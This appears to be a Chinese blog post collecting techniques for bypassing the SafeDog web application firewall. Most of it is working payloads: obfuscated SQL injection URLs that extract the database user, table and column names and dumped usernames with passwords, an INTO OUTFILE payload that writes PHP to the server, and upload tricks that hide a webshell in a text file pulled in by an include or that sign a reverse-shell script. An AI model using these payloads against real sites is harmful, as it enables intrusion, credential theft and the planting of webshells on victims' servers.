• 绕过安全狗【后续再更新】


    sql绕过安全狗

    get->post

    借助burp

    内联注释(加一些东西混淆)

    看回显获取用户

    url.php?id=-1'/*!50000union/*!(select*/1,2,3);
    url.php?id=-1'/*!50000union/*!(select*/~1,2,3);
    url.php?id=-1'/*!50000union/*!50000/*!(select*/~1,2,3)  
    http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
    1' /*!44111union*/ /*!44111select*/ 1, /*!44111user*//*!44111()*/#
    1' /*!44111union*/ /*!44111select*/ 1,(/*!44111select*//*!44111password*//*!44111from*//*!44111users*/limit 0,1)#
    

    获取表名

    http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))
    

    获取列名

    http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)
    

    获取数据

    http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)
    

    Getshell

    http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)
    

    chunked编码(分割)

    burp功能

    其他

    '&&true '&&false  ' && true ' && false
    '||true '||false   ' || ture  ' ||false
    字符型的话也可以通过浮点数 1.0and 1=1 来绕过对and的检测
    
    异或xor
    

    上传绕过安全狗

    方法1:

    php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)

    将大马写到txt文件中,命名为dama.txt,再新建一个文本

    asp的写入<!-#include file="dama.txt"-> 保存,两文件放到同目录下,反问url/x.asp,然后访问即可

    php的写入<?php require_once(dama.txt);?>

    方法2:

    有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。

    后面在继续更新。。。

  • 相关阅读:
    day_13
    day_12
    day_11
    day_10
    day_09
    day_08
    day_07
    day_06
    cmder 基本配置和使用
    php自动加载
  • 原文地址:https://www.cnblogs.com/forforever/p/13773995.html
Copyright © 2020-2023  润新知